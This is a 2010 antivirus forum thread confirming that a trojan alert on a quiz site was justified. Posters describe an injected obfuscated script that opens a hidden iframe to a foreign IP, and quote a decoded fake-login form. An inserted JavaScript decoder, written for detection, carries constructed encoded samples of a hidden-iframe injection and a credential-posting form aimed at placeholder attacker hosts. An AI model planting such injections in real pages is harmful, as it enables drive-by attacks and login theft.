Author Topic: Nerdtests and Avast: Probably F/P?  (Read 5501 times)

Offline Ruuga

  • Newbie
  • Posts: 1
Nerdtests and Avast: Probably F/P?
« on: July 07, 2010, 07:17:17 PM »
So today I tried to open this site, but Avast thinks there is a trojan. I'm using Avast 5, but I didn't get the alarm when I was using version 4. Avast also sends an alarm if you type the URL into Google. My friend also said that he got an alert with Avast 5.
« Last Edit: July 09, 2010, 09:59:37 AM by igor »

Offline Pondus

  • avast! Überevangelist
  • Maybe Bot
  • Posts: 21699
  • Gender: Male
« Last Edit: July 07, 2010, 07:41:18 PM by Pondus »
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • Posts: 69213
  • Gender: Male
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #2 on: July 07, 2010, 08:00:50 PM »
It appears that one of the Google script tags has been hacked (2nd to last in the page code, see image1), inserting a long line of obfuscated JavaScript.

This script, when decoded (image2), creates a hidden iframe tag that tries to open an IP in Ukraine, which is highly suspect.

So I believe that the detection is good.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • Posts: 20140
  • Gender: Male
  • malware fighter
Re: Nerdtests and Avast: Probably F/P?
« Reply #3 on: July 07, 2010, 10:02:10 PM »
Hi DavidR,

And what does that long unescape string do? Well, that is hex-encoded JavaScript that decodes to lines such as:
<FORM METHOD="POST" ACTION="some address/form/mailto.cgi" ENCTYPE="x-wXw-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="wXwmalcreant*com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Some Login Hacked! (by OUR INC`s Fake Login)"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="hxtp/etc. etc. ">
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus
« Last Edit: July 07, 2010, 10:08:47 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
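The two readings above (DavidR's hidden iframe to a bare IP, polonus's hidden-input form posting to a mail CGI) both come out of the same kind of injected `document.write(unescape('...'))` blob. The following is an added example, not code from the thread or from avast, showing how to statically decode such a blob offline and flag what it reconstructs. The sample injections and the 192.0.2.10 address (a TEST-NET documentation range) are constructed for the example; the real script in the thread was not copied here.

```javascript
// Added example: decode injected document.write(unescape('...')) blobs
// and flag hidden iframes, bare-IP targets and forms posting to a mail CGI.
// Samples are constructed; 192.0.2.10 is a documentation address, not a real host.

const SAMPLE_IFRAME_INJECT =
  "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F192.0.2.10%2Fin.cgi%3F3%22" +
  "%20width%3D%220%22%20height%3D%220%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'))</script>";

const SAMPLE_FORM_INJECT =
  '<script>document.write(unescape("%3CFORM%20METHOD%3D%22POST%22%20ACTION%3D%22http%3A%2F%2F192.0.2.10%2Fform%2Fmailto.cgi%22%3E' +
  '%3CINPUT%20TYPE%3D%22hidden%22%20NAME%3D%22Mail_From%22%20VALUE%3D%22attacker%40example.com%22%3E%3C%2FFORM%3E"))</script>';

// Legacy JS unescape(): %XX -> one byte, %uXXXX -> one UTF-16 code unit.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Every string literal passed to unescape(...) in a script body.
function extractUnescapeArgs(script) {
  const out = [];
  const re = /unescape\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  let m;
  while ((m = re.exec(script)) !== null) out.push(m[2]);
  return out;
}

// Read one attribute (quoted or bare) out of a raw tag attribute string.
function getAttr(attrs, name) {
  const r = new RegExp(`(?:^|\\s)${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i').exec(attrs);
  return r ? (r[1] ?? r[2] ?? r[3]) : null;
}

// True when the URL's host is a literal IPv4 address rather than a name.
function isBareIpUrl(url) {
  try { return /^\d{1,3}(\.\d{1,3}){3}$/.test(new URL(url).hostname); }
  catch { return false; }
}

// src of every <iframe> sized to zero or styled invisible.
function findHiddenIframes(html) {
  const found = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const a = m[1];
    const style = getAttr(a, 'style') || '';
    const hidden = getAttr(a, 'width') === '0' || getAttr(a, 'height') === '0' ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(style);
    if (hidden) found.push(getAttr(a, 'src'));
  }
  return found;
}

// Every <form> with its action and hidden inputs (name -> value).
function findForms(html) {
  const forms = [];
  const re = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const hidden = {};
    const inRe = /<input\b([^>]*)>/gi;
    let i;
    while ((i = inRe.exec(m[2])) !== null) {
      if ((getAttr(i[1], 'type') || '').toLowerCase() === 'hidden')
        hidden[getAttr(i[1], 'name')] = getAttr(i[1], 'value');
    }
    forms.push({ action: getAttr(m[1], 'action'), hidden });
  }
  return forms;
}

// Decode each unescape() payload and summarise the indicators found.
function analyzeInjectedScript(script) {
  const decoded = extractUnescapeArgs(script).map(jsUnescape);
  const hiddenIframes = decoded.flatMap(findHiddenIframes);
  const forms = decoded.flatMap(findForms);
  const reasons = [];
  if (hiddenIframes.length) reasons.push('hidden iframe');
  if (hiddenIframes.some(isBareIpUrl) || forms.some(f => isBareIpUrl(f.action))) reasons.push('bare IP target');
  if (forms.some(f => /mailto\.cgi/i.test(f.action || ''))) reasons.push('form posting to mail CGI');
  return { decoded, hiddenIframes, forms, verdict: reasons.length ? 'suspicious: ' + reasons.join(', ') : 'nothing flagged' };
}

console.log(JSON.stringify(analyzeInjectedScript(SAMPLE_IFRAME_INJECT), null, 2));
console.log(JSON.stringify(analyzeInjectedScript(SAMPLE_FORM_INJECT), null, 2));
```

Run it with `node` on a saved copy of the injected `<script>` tag (read the file into a string and pass it to `analyzeInjectedScript`). The decoder is a static string transform, so the payload is never executed; the iframe test treats width or height of 0 and `display:none`/`visibility:hidden` as hidden, and a visible iframe to a named host is deliberately not flagged.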

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • Posts: 69213
  • Gender: Male
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #4 on: July 08, 2010, 12:19:59 AM »
What it does is shown in the last image and in what I said in the post (which seems to differ from your example): it creates a hidden iframe and connects to an IP in Ukraine. After that I don't care what it does, just that avast has, in my mind, done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj]).

Even if your explanation is right, it is still a good detection by avast; I just don't go to any depth when I find what I consider enough evidence to confirm a good detection.

Offline Tech

  • avast! team
  • Certainly Bot
  • Posts: 64880
  • Gender: Male
Re: Nerdtests and Avast: Probably F/P?
« Reply #5 on: July 13, 2010, 01:17:32 AM »
You've received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/
The best things in life are free.

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • Posts: 69213
  • Gender: Male
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #6 on: July 13, 2010, 03:03:16 AM »
Thanks for the notice Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D